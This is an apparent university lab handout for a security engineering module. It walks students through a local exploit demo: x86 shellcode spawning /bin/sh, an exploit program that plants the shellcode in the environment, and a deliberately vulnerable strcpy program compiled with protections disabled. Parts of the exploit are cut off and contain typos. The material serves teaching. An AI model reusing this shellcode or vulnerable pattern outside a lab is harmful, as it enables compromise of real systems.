Microsoft Word – 2.5.5 format string vulnerability demo.docx
1
MSc Advanced Cyber Security
7CCSONSE Security Engineering
Demonstration of Format String Vulnerabilities in Week 2
This document provides the steps to run the vulnerable program in the Week 2.5.3. Follow the steps
below, you can implement and run the program in the module VM.
Step1: Log in your VM
This can be done by the following command on a terminal on your operation system;
$ ssh .kcl.ac.uk
You may be asked for inputting your password.
Step2: Write the shellcode
Use command $ vi shellcode.s to create the shellcode. The demo code is shown follow. For
detailed explanation of how the code be implemented, please check the webinar.
.data
.globl shellcode_start
shellcode_start:
jmp stringbinls
back:
pop %ebx
xor %eax, %eax
mov %eax, %edx
mov %ebx, 0x8(%ebx)
movl %eax, 0xc(%ebx)
lea 0x8(%ebx), %ecx
movb %al, 0x7(%ebx)
movb $0xb, %al
int $0x80
stringbinls:
call back
.string “/bin/sh”
2
Fig.1 Shellcode demo
Step3: Write an exploit program
We use $ vi x-local.c to create the exploit program.
#include
#include
#include
#include
extern char shellcode_start[];
#define VULN “./vuln”
int main(void)
{
int i;
char iv[600];
char *n[] = {VULN, iv, NULL};
char *env[] = {shellcode_start, NULL};
unsigned int addr;
3
addr = 0xc0000000-8-strlen(VULN)-1-strlen(shellcode_start)-1;
fprint(stderr, “Using address: %#010x\n”, addr);
memset(iv, 0, sizeof(iv));
for(i=0; i
#include
#include
#include
int foo(char *);
4
int main(int argc, char **argv)
{
if(argc > 1)
foo(argv[1]);
printf(“This is main.\n”);
fflush(stdout);
return 0;
}
int foo(char *input){
char buf[512];
memset(buf, 0, sizeof(buf));
strcpy(buf, input);
print(“buf is @ %p (%s)\n”, buf, buf);
fflush(stdout);
return 0;
}
Fig.3 Vulnerable program
5
Step4: Compile the two program in your VM
We use gcc command to compile the program. This package has already been installed on your VM.
To make a clear effect of the targeted code, we firstly set flags for the compiling process.
$ export CFLAGS=”-m32 -fno-stack-protector -z execstack -fno-PIE -no-pie –
g”
The explanation for each flag here can refer the previous demonstration document.
We use $ export to ensure the environment variable CFLAGS to be passed to child processes (gcc
compiling process).
We firstly compile the vulnerable programs:
$ gcc -o vuln vuln.c $CFLAGS
We then use the following command to compile the code:
$ gcc -o x-local x-local.c shellcode.s $CFLAGS
Here the -o flag set the output path and filename, also the environment variable CFLAGS is used.
Fig.4 shows the compiling process.
Fig.4 Compile two programs
Step5: Enforce 3GB split
We use the following command to enforce 3GB split.
$ setarch `uname -m` -3 -L -v $SHELL
Then we run the program, we will see the shellcode has been executed:
$ ./x-local
The execute result is shown in Fig.5, the shellcode “bin/sh” is executed
6
Fig.5 Execution result
Step6: Output steam into a file
We use the following command to save the output of x-local into a file.
$ ./x-local > stdout.txt
To show the content of stdout.txt as Fig.6, we use command $ less stdout.txt to see our
exploit. The
7
Fig.6 stdout.txt
End of the demonstration